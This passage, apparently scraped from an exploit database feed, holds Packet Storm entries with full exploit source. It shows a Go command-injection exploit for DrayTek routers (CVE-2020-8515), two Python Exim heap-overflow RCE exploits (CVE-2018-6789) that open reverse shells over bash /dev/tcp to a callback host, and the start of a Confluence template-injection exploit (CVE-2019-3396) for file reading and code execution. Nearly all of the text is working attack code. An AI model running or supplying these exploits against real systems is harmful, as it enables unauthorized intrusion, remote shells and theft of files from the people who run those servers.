\nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ \nhttps://thehackernews.com/2020/03/draytek-network-hacking.html \nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ \nexploiting using keyPath \nPOST /cgi-bin/mainfunction.cgi HTTP/1.1 \nHost: 1.2.3.4 \nContent-Length: 89 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \n*/ \n \nimport ( \n\"fmt\" \n\"io/ioutil\" \n\"net/http\" \n\"net/url\" \n\"os\" \n\"strings\" \n) \n \nfunc usage() { \n \nfmt.Println(\"CVE-2020-8515 exploit by @0xsha \") \nfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" ) \nfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" ) \n} \n \nfunc main() { \n \n \nif len(os.Args) < 3 { \nusage() \nos.Exit(-1) \n} \n \ntargetUrl := os.Args[1] \n//cmd := \"cat /etc/passwd\" \ncmd := os.Args[2] \n \n \n// payload preparation \nvulnerableFile := \"/cgi-bin/mainfunction.cgi\" \n// specially crafted CMD \n// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a \npayload :=`' \n/bin/sh -c 'CMD' \n'` \npayload = strings.ReplaceAll(payload,\"CMD\", cmd) \nbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\") \n \n//PostForm call url encoder internally \nresp, err := http.PostForm(targetUrl+vulnerableFile , \nurl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} }) \n \nif err != nil{ \nfmt.Println(\"error connecting host\") \nos.Exit(-1) \n} \n \n \ndefer resp.Body.Close() \nbody, err := ioutil.ReadAll(resp.Body) \n \nif err != nil{ \nfmt.Println(\"error reading data\") \nos.Exit(-1) \n} \n \nfmt.Println(string(body)) \n \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156979/draytek-exec.txt"}, {"lastseen": "2018-10-25T10:13:22", "description": "", "cvss3": {}, "published": "2018-10-24T00:00:00", "type": "packetstorm", "title": "Exim 4.90 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-6789"], "modified": "2018-10-24T00:00:00", "id": "PACKETSTORM:149926", "href": "https://packetstormsecurity.com/files/149926/Exim-4.90-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: exim 4.90 - Remote Code Execution \n# Date: 2018-10-24 \n# Exploit Author: hackk.gr \n# Vendor Homepage: exim.org \n# Version: exim < 4.90 \n# Tested on: debian exim 4.89, ubuntu exim 4.86_2 \n# CVE : CVE-2018-6789 \n \n#!/usr/bin/python \n#debian exim 4.89 \n#ubuntu exim 4.86_2 \nimport time \nimport socket \nimport struct \nimport os \nimport os.path \nimport sys \nimport ssl \nimport random \nfrom multiprocessing import Process, Queue \n \ns = None \nf = None \ntest = True \nrcpt_index_start = 0x120 \nbufsize = 8200 \n \ndef connect(host, port): \nglobal s \nglobal f \ns = socket.create_connection((host,port)) \nf = s.makefile(\"rw\", bufsize=0) \n \ndef p(v): \nreturn struct.pack(\"<Q\", v) \n \ndef readuntil(delim='\\n'): \ndata = '' \nauth_plain_available = False \nwhile True: \n \nl = f.readline() \nif l == \"\": \nreturn \"\" \n \nif l.find(\"PLAIN\") > -1: \nauth_plain_available = True \n \nif test: \nif len(l) > 70: \nsys.stdout.write(l[:70] + \" ...\\n\") \nsys.stdout.flush() \nelse: \nprint l.strip(\"\\r\").strip(\"\\n\") \n \ndata = data + l \nif data.find(delim) > -1: \nreturn data \nif l == \"\\n\" or l == \"\": \nreturn \"\" \nreturn data \n \ndef write(data): \nf.write(data + \"\\n\") \ndef ehlo(v): \nwrite(\"EHLO \" + v) \nreturn readuntil('HELP') \ndef unrec(v): \nwrite(v) \nreaduntil('command') \ndef auth_plain(v): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef auth_plain1(v): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef auth_plain2(v,value): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nvalue = chr(value).encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode[:-1] + value) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \ndef one_byte_overwrite(): \nv = \"C\" * bufsize \nencode = v.encode('base64').replace('\\n','').replace('=','') \nencode = encode[:-1] + \"PE\" \nwrite(\"AUTH PLAIN \" + encode) \nl = f.readline() \nif test: \nif l.find(\"Incorrect\") > -1: \nraise Exception(\"WRONG DRIVER\") \nif l.find(\"not advert\") > -1 or l.find(\"not supported\")> -1: \nraise Exception(\"NO AUTH PLAIN CONFIG\") \nprint l \n \nlookup_table = {0x00: [0,3], \n0x01: [0,7], \n0x02: [0,11], \n0x03: [0,15], \n0x04: [0,19], \n0x05: [0,23], \n0x06: [0,27], \n0x07: [0,31], \n0x08: [0,35], \n0x09: [0,39], \n0x0a: [0,43], \n0x0b: [0,47], \n0x0c: [0,51], \n0x0d: [0,55], \n0x0e: [0,59], \n0x0f: [0,63], \n0x10: [0,67], \n0x11: [0,71], \n0x12: [0,75], \n0x13: [0,79], \n0x14: [0,83], \n0x15: [0,87], \n0x16: [0,91], \n0x17: [0,95], \n0x18: [0,99], \n0x19: [0,103], \n0x1a: [0,107], \n0x1b: [0,111], \n0x1c: [0,115], \n0x1d: [0,119], \n0x1e: [0,123], \n0x1f: [0,127], \n0x20: [0,131], \n0x21: [0,135], \n0x22: [0,139], \n0x23: [0,143], \n0x24: [0,147], \n0x25: [0,151], \n0x26: [0,155], \n0x27: [0,159], \n0x28: [0,163], \n0x29: [0,167], \n0x2a: [0,171], \n0x2b: [0,175], \n0x2c: [0,179], \n0x2d: [0,183], \n0x2e: [0,187], \n0x2f: [0,191], \n0x30: [0,195], \n0x31: [0,199], \n0x32: [0,203], \n0x33: [0,207], \n0x34: [0,211], \n0x35: [0,215], \n0x36: [0,219], \n0x37: [0,223], \n0x38: [0,227], \n0x39: [0,231], \n0x3a: [0,235], \n0x3b: [0,239], \n0x3c: [0,243], \n0x3d: [0,247], \n0x3e: [0,251], \n0x3f: [0,254], \n0x40: [64,3], \n0x41: [64,7], \n0x42: [64,11], \n0x43: [64,15], \n0x44: [64,19], \n0x45: [64,23], \n0x46: [64,27], \n0x47: [64,31], \n0x48: [64,35], \n0x49: [64,39], \n0x4a: [64,43], \n0x4b: [64,47], \n0x4c: [64,51], \n0x4d: [64,55], \n0x4e: [64,59], \n0x4f: [64,63], \n0x50: [64,67], \n0x51: [64,71], \n0x52: [64,75], \n0x53: [64,79], \n0x54: [64,83], \n0x55: [64,87], \n0x56: [64,91], \n0x57: [64,95], \n0x58: [64,99], \n0x59: [64,103], \n0x5a: [64,107], \n0x5b: [64,111], \n0x5c: [64,115], \n0x5d: [64,119], \n0x5e: [64,123], \n0x5f: [64,127], \n0x60: [64,131], \n0x61: [64,135], \n0x62: [64,139], \n0x63: [64,143], \n0x64: [64,147], \n0x65: [64,151], \n0x66: [64,155], \n0x67: [64,159], \n0x68: [64,163], \n0x69: [64,167], \n0x6a: [64,171], \n0x6b: [64,175], \n0x6c: [64,179], \n0x6d: [64,183], \n0x6e: [64,187], \n0x6f: [64,191], \n0x70: [64,195], \n0x71: [64,199], \n0x72: [64,203], \n0x73: [64,207], \n0x74: [64,211], \n0x75: [64,215], \n0x76: [64,219], \n0x77: [64,223], \n0x78: [64,227], \n0x79: [64,231], \n0x7a: [64,235], \n0x7b: [64,239], \n0x7c: [64,243], \n0x7d: [64,247], \n0x7e: [64,251], \n0x7f: [64,254], \n0x80: [128,3], \n0x81: [128,7], \n0x82: [128,11], \n0x83: [128,15], \n0x84: [128,19], \n0x85: [128,23], \n0x86: [128,27], \n0x87: [128,31], \n0x88: [128,35], \n0x89: [128,39], \n0x8a: [128,43], \n0x8b: [128,47], \n0x8c: [128,51], \n0x8d: [128,55], \n0x8e: [128,59], \n0x8f: [128,63], \n0x90: [128,67], \n0x91: [128,71], \n0x92: [128,75], \n0x93: [128,79], \n0x94: [128,83], \n0x95: [128,87], \n0x96: [128,91], \n0x97: [128,95], \n0x98: [128,99], \n0x99: [128,103], \n0x9a: [128,107], \n0x9b: [128,111], \n0x9c: [128,115], \n0x9d: [128,119], \n0x9e: [128,123], \n0x9f: [128,127], \n0xa0: [128,131], \n0xa1: [128,135], \n0xa2: [128,139], \n0xa3: [128,143], \n0xa4: [128,147], \n0xa5: [128,151], \n0xa6: [128,155], \n0xa7: [128,159], \n0xa8: [128,163], \n0xa9: [128,167], \n0xaa: [128,171], \n0xab: [128,175], \n0xac: [128,179], \n0xad: [128,183], \n0xae: [128,187], \n0xaf: [128,191], \n0xb0: [128,195], \n0xb1: [128,199], \n0xb2: [128,203], \n0xb3: [128,207], \n0xb4: [128,211], \n0xb5: [128,215], \n0xb6: [128,219], \n0xb7: [128,223], \n0xb8: [128,227], \n0xb9: [128,231], \n0xba: [128,235], \n0xbb: [128,239], \n0xbc: [128,243], \n0xbd: [128,247], \n0xbe: [128,251], \n0xbf: [128,254], \n0xc0: [192,3], \n0xc1: [192,7], \n0xc2: [192,11], \n0xc3: [192,15], \n0xc4: [192,19], \n0xc5: [192,23], \n0xc6: [192,27], \n0xc7: [192,31], \n0xc8: [192,35], \n0xc9: [192,39], \n0xca: [192,43], \n0xcb: [192,47], \n0xcc: [192,51], \n0xcd: [192,55], \n0xce: [192,59], \n0xcf: [192,63], \n0xd0: [192,67], \n0xd1: [192,71], \n0xd2: [192,75], \n0xd3: [192,79], \n0xd4: [192,83], \n0xd5: [192,87], \n0xd6: [192,91], \n0xd7: [192,95], \n0xd8: [192,99], \n0xd9: [192,103], \n0xda: [192,107], \n0xdb: [192,111], \n0xdc: [192,115], \n0xdd: [192,119], \n0xde: [192,123], \n0xdf: [192,127], \n0xe0: [192,131], \n0xe1: [192,135], \n0xe2: [192,139], \n0xe3: [192,143], \n0xe4: [192,147], \n0xe5: [192,151], \n0xe6: [192,155], \n0xe7: [192,159], \n0xe8: [192,163], \n0xe9: [192,167], \n0xea: [192,171], \n0xeb: [192,175], \n0xec: [192,179], \n0xed: [192,183], \n0xee: [192,187], \n0xef: [192,191], \n0xf0: [192,195], \n0xf1: [192,199], \n0xf2: [192,203], \n0xf3: [192,207], \n0xf4: [192,211], \n0xf5: [192,215], \n0xf6: [192,219], \n0xf7: [192,223], \n0xf8: [192,227], \n0xf9: [192,231], \n0xfa: [192,235], \n0xfb: [192,239], \n0xfc: [192,243], \n0xfd: [192,247], \n0xfe: [192,251], \n0xff: [192,254], \n} \n \ndef exploit(b1, b2, b3, rcpt_index, target, cb, cbport): \nglobal s \nglobal f \n \n#if c % 0x50 == 0: \n# print \" byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x\" % (b1, b2, b3, rcpt_index) \n \ntry: \nconnect(target, 25) \nexcept: \nraise Exception(\"CONNECTION ERROR\") \n \nbanner = f.readline() \nif test: \nprint banner.strip(\"\\r\").strip(\"\\n\") \n \nehlo(\"A\" * 8000) \n \nehlo(\"B\" * 16) \n \nunrec(\"\\xff\" * 2000) \nehlo(\"D\" * bufsize) \none_byte_overwrite() \n \nfake_header = p(0) \nfake_header += p(0x1f51) \nres = auth_plain1(\"E\" * 176 + fake_header + \"E\" * (bufsize-176-len(fake_header))) \n \nres = ehlo(\"F\" * 16) \nif res == \"\": \nraise Exception(\"CRASHED\") \n \nunrec(\"\\xff\" * 2000) \nunrec(\"\\xff\" * 2000) \n \nfake_header = p(0x4110) \nfake_header += p(0x1f50) \nauth_plain(\"G\" * 176 + fake_header + \"G\" * (bufsize-176-len(fake_header))) \n \nauth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1]) \nres = ehlo(\"I\" * 16) \n \nif res == \"\": \ns.close() \nf.close() \nraise Exception(\"EHLO(I)\") \n \nacl_smtp_rcpt_offset = rcpt_index \nlocal_host = cb \nlocal_port = cbport \ncmd = \"/usr/bin/setsid /bin/bash -c \\\"/bin/bash --rcfile <(echo 'echo \" + \"0x%02x \" % b1 + \"0x%02x \" % b2 + \"0x%02x \" % b3 + \"0x%04x \" % rcpt_index + \"') -i >& /dev/tcp/\" + local_host + \"/\" + str(local_port) + \" 0>&1\\\"\" \ncmd_expansion_string = \"${run{\" + cmd + \"}}\\0\" \n \nauth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"\\x00\")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \n \nwrite(\"MAIL FROM:<postmaster@localhost>\") \n \nres = f.readline() \n \nif res != \"\": \nif test: \nraise Exception(\"NO TARGET\") \nraise Exception(\"OFFSET\") \n \nraise Exception(\"BYTE\") \n \nwrite(\"RCPT TO:<postmaster@localhost>\") \nreaduntil(\"Accepted\") \n \nwrite(\"RCPT TO:<postmaster@localhost>\") \nif f.readline() == \"\": \ns.close() \nf.close() \nraise Exception(\"RCPT TO\") \n \ndef checkvuln(host): \ntry: \nexploit(0xff, 0xff, 0xff, rcpt_index_start, host, \"127.0.0.1\", \"1337\") \nexcept Exception as e: \nprint e \nif str(e) == \"EHLO(I)\": \nreturn True \nreturn False \n \ndef _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q): \nif b1 > 0xff or b2 > 0xff or b3 > 0xff: \nq.put([b1,b2,b3,\"VALUE\"]) \nreturn \ntry: \nexploit(b1, b2, b3, rcpt_index, target, cb, cbport) \nexcept Exception as e: \ne = str(e) \nif e == \"[Errno 104] Connection reset by peer\" or e.find(\"EOF occurred\") > -1: \ne = \"BYTE\" \nq.put([b1,b2,b3,e]) \n \nif __name__ == '__main__': \nif len(sys.argv) < 4: \nprint \"%s <cb> <cbport> <target>\" % sys.argv[0] \nsys.exit(1) \n \ntarget = sys.argv[3] \ncb = sys.argv[1] \ncbport = sys.argv[2] \n \nif len(sys.argv) == 8: \nprint \"reuse fixed offsets\" \nb1 = int(sys.argv[4], 16) \nb2 = int(sys.argv[5], 16) \nb3 = int(sys.argv[6], 16) \nrcpt_index = int(sys.argv[7], 16) \n \ntry: \nexploit(b1, b2, b3, rcpt_index, target, cb, cbport) \nexcept Exception as e: \nprint e \nsys.exit(1) \n \nprint \"check vuln\" \nif not checkvuln(target): \nprint \"false\" \nsys.exit(1) \n \nprint \"true\" \ntest=False \n \nallbytes = [offset for offset in xrange(0, 0x110)] \nallbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)] \nb3_survived = [] \n \nb3_survived_stop = False \ntested = [] \ntry: \nq = Queue() \nprocs = [] \nprint \nprint \"Discover first byte in offset\" \nprint \nsys.stdout.write(\"Try Offsets %02x%02x%02x to %02x%02x%02x ...\" % (0x00,0xff,0xff,0xff,0xff,0xff)) \nfor b3 in allbytes: \nif b3 % 0x10 == 0 and b3 <= 0xff: \nsys.stdout.write(\"\\rTry Offsets %02x%02x%02x to %02x%02x%02x ...\" % (b3,0xff,0xff,0xff,0xff,0xff)) \n \nb1 = 0x00 \n \nfor b2 in allbytes_10: \nproc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nto_break = False \nif len(procs) == 16: \nfor i in xrange(0,16): \nresult = q.get() \nif result[3] == \"BYTE\": \nif [b3, b2] not in tested: \ntested.append([b3, b2]) \nb3_survived.append(result[2]) \nsys.stdout.write(\"\\nOffset %02x%02x%02x Survived ...\" % (result[2],result[1],result[0])) \nelse: \nto_break = True \n \nprocs[:] = [] \nif to_break: \nbreak \n \nprint \"\\n\" \nprint \"Discover offsets for rcpt index brute force ...\" \nprint \nb1_survived = {} \nfor b3 in b3_survived: \nfor b2 in allbytes: \nif b2 % 0x10 == 0 and b2 <= 0xff: \nsys.stdout.write(\"\\r\\r\\nTry Offsets %02x%02x%02x to %02x%02x%02x ... \" % (b3,b2,0x00,b3,0xff,0xf0)) \nfor b1 in allbytes_10: \nproc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nif len(procs) == 16: \nfor i in xrange(0,16): \nresult = q.get() \nif result[3] == \"OFFSET\": \nif result[2] not in b1_survived: \nb1_survived[result[2]] = [] \nb1_survived[result[2]].append(result) \nsys.stdout.write(\"\\n%02x%02x%02x Survived ...\" % (result[2],result[1],result[0])) \n \nprocs[:] = [] \n \niteration_list = [n for n in xrange(0x100,0x1000,0x10)] \niteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)] \n \nfor n in iteration_list2: \niteration_list.append(n) \n \nb1_survived_priority = [] \nb1_survived_additional = [] \n \nfor key in sorted(b1_survived): \nif len(b1_survived[key]) < 7: \nb1_survived_priority.append(b1_survived[key]) \nelse: \nb1_survived_additional.append(b1_survived[key]) \n \n_b1_survived = [] \nfor result in b1_survived_priority: \n_b1_survived.append(result) \nfor result in b1_survived_additional: \n_b1_survived.append(result) \n \nprint \"\\n\" \nprint \"Start rcpt index brute force ...\" \nprint \n \nfor result in _b1_survived: \nfor s in result: \nsys.stdout.write(\"\\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ...\" % (s[2],s[1],s[0])) \nfor rcpt_index in iteration_list: \nproc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q)) \nprocs.append(proc) \nproc.daemon = True \nproc.start() \n \nif len(procs) == 16: \nfor i in xrange(0,16): \nq.get() \n \nprocs[:] = [] \nexcept KeyboardInterrupt: \npass \n \nprint \"done.\" \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149926/exim490-exec.txt"}, {"lastseen": "2018-05-07T01:19:11", "description": "", "cvss3": {}, "published": "2018-05-03T00:00:00", "type": "packetstorm", "title": "Exim base64d Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-6789"], "modified": "2018-05-03T00:00:00", "id": "PACKETSTORM:147456", "href": "https://packetstormsecurity.com/files/147456/Exim-base64d-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport time \nimport socket \nimport struct \ns = None \nf = None \ndef logo(): \nprint \nprint \" CVE-2018-6789 Poc Exploit\" \nprint \"@straight_blast ; straightblast426@gmail.com\" \nprint \ndef connect(host, port): \nglobal s \nglobal f \ns = socket.create_connection((host,port)) \nf = s.makefile('rw', bufsize=0) \ndef p(v): \nreturn struct.pack(\"<Q\", v) \ndef readuntil(delim='\\n'): \ndata = '' \nwhile not data.endswith(delim): \ndata += f.read(1) \nreturn data \ndef write(data): \nf.write(data + \"\\n\") \ndef ehlo(v): \nwrite(\"EHLO \" + v) \nreaduntil('HELP') \ndef unrec(v): \nwrite(v) \nreaduntil('command') \ndef auth_plain(v): \nencode = v.encode('base64').replace('\\n','').replace('=','') \nwrite(\"AUTH PLAIN \" + encode) \nreaduntil('data') \ndef one_byte_overwrite(): \nv = \"C\" * 8200 \nencode = v.encode('base64').replace('\\n','').replace('=','') \nencode = encode[:-1] + \"PE\" \nwrite(\"AUTH PLAIN \" + encode) \nreaduntil('data') \ndef exploit(): \nlogo() \nconnect('localhost', 25) \nprint \"[1] connected to target\" \ntime.sleep(0.5) \n \nehlo(\"A\" * 8000) \nehlo(\"B\" * 16) \nprint \"[2] created free chunk size 0x6060 in unsorted bin\" \n \nunrec(\"\\xff\" * 2000) \nehlo(\"D\" * 8200) \none_byte_overwrite() \nprint \"[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0\" \n \nfake_header = p(0) \nfake_header += p(0x1f51) \nauth_plain(\"E\" * 176 + fake_header + \"E\" * (8200-176-len(fake_header))) \nprint \"[4] patched chunk with fake header so extended chunk can be freed\" \n \nehlo(\"F\" * 16) \nprint \"[5] freed extended chunk\" \n \nunrec(\"\\xff\" * 2000) \nunrec(\"\\xff\" * 2000) \nprint \"[6] occupied 1st and 3rd item in unsorted bin with fillers\" \n \nfake_header = p(0x4110) \nfake_header += p(0x1f50) \nauth_plain(\"G\" * 176 + fake_header + \"G\" * (8200-176-len(fake_header))) \nprint \"[7] patched chunk with fake header so extended chunk can be allocated\" \n \naddress = 0x55d7e5864480 \nauth_plain(\"H\" * 8200 + p(0x2021) + p(address) + p(0x2008) + \"H\" * 184) \nprint \"[8] overwrite 'next' pointer with ACL store block address\" \n \nehlo(\"I\" * 16) \nprint \"[9] freed the ACL store block\" \n \nacl_smtp_rcpt_offset = 288 \nlocal_host = '192.168.0.159' \nlocal_port = 1337 \ncmd = \"/bin/bash -c \\\"/bin/bash -i >& /dev/tcp/\" + local_host + \"/\" + str(local_port) + \" 0>&1\\\"\" \ncmd_expansion_string = \"${run{\" + cmd + \"}}\\0\" \nauth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"J\" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \nprint \"[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression\" \n \nwrite(\"MAIL FROM:<test@pwned.com>\") \nreaduntil(\"OK\") \nwrite(\"RCPT TO:<shell@pwned.com>\") \nprint \"[11] triggered RCPT TO and executing shell expression ... enjoy your shell!\" \nprint \nif __name__ == '__main__': \nexploit() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147456/eximbase64d-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-22T15:47:25", "description": "", "cvss3": {}, "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made \nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being \nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all \noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this \nalternative approach by first uploading the template to the server and then loading it with original vulnerability from \nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to his \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path \nis pointing to. As in original exploit no authentication is needed for this mode. \n \nLimitations of path traversal exploit: \n- not possible to distinguish between non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file \nwith payload from local filesystem instead from remote system. \n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. \n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", 